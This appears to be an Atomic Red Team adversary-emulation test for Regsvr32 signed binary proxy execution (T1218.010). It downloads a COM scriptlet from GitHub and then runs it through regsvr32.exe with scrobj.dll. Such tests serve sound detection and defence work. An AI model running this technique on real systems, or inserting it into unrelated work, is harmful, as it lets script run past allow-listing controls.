#TechniqueName: Signed Binary Proxy Execution: Regsvr32
#AtomicTestName: Regsvr32 local COM scriptlet execution
#Language: cmd

#get_prereq_commands
New-Item -Type Directory (split-path PathToAtomicsFolder\T1218.010\src\RegSvr32.sct) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/src/RegSvr32.sct" -OutFile "PathToAtomicsFolder\T1218.010\src\RegSvr32.sct"


#prereq_commands
if (Test-Path PathToAtomicsFolder\T1218.010\src\RegSvr32.sct) {exit 0} else {exit 1}


#commands
regsvr32.exe /s /u /i:PathToAtomicsFolder\T1218.010\src\RegSvr32.sct scrobj.dll

